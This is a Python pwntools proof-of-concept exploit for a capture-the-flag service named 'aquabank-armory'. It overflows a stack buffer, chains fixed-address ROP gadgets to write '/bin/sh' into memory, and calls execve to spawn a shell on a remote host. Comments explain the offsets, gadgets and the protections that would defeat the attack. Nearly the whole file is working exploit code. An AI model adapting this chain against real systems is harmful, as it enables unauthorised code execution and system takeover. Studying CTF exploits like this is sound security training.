"""Proof-of-concept for the "aquabank-armory" CTF service.

Overwrites the saved return address of a stack buffer with a ROP chain that
stores "/bin/sh" in a writable address and then issues the execve syscall.
Nothing here is randomised: every gadget is a fixed address, which only works
because the target image is loaded at a constant base (non-PIE -- presumably,
verify with checksec). A stack canary would abort before the first gadget
runs, and PIE/ASLR on the main image would invalidate every address below.
"""
from pwn import *

# Bytes of filler between the start of the overflowed buffer and the saved
# return address; the first gadget is written right after it.
OFF = 64

# checksec=False only silences pwntools' protections printout for the ELF.
context.binary = elf = ELF("./aquabank-armory", checksec=False)

# p = process(elf.path)
p = remote("offsec.m0lecon.it", 13540)

# NOTE(review): recvline()'s first positional argument is keepends, not a
# delimiter -- the bytes passed here act only as a truthy flag, so this reads
# one line whatever its content rather than waiting for the banner.
print(p.recvline(b"[armory] Storeroom open -- pick your weapons:\n"))

# Gadget addresses, all constant because the image has a fixed load base.
ret = 0x000000000040101A                    # lone `ret`; presumably 16-byte stack alignment
syscall = 0x0000000000401324
pop_rdi = 0x000000000040196E
pop_rsi = 0x0000000000401977
pop_rdx = 0x0000000000401980
pop_rax = 0x00000000004214EB
writable = 0x4AC000                         # scratch address the path string is stored at
mov_qword_ptr_rdx_rax = 0x000000000040AB08  # write-what-where primitive: *rdx = rax
shellstr = b"/bin/sh\x00"                   # exactly 8 bytes so one pop loads it into rax

payload = flat(
    b"A" * OFF,
    p64(ret),
    # Stage 1: store shellstr at `writable` via the mov gadget.
    p64(pop_rdx),
    p64(writable),
    p64(pop_rax),
    shellstr,
    p64(mov_qword_ptr_rdx_rax),
    # Stage 2: execve(writable, NULL, NULL); 59 is the x86-64 execve number.
    p64(pop_rax),
    p64(59),
    p64(pop_rdi),
    p64(writable),
    p64(pop_rsi),
    p64(0),
    p64(pop_rdx),
    p64(0),
    p64(syscall),
)

p.sendline(payload)
p.interactive()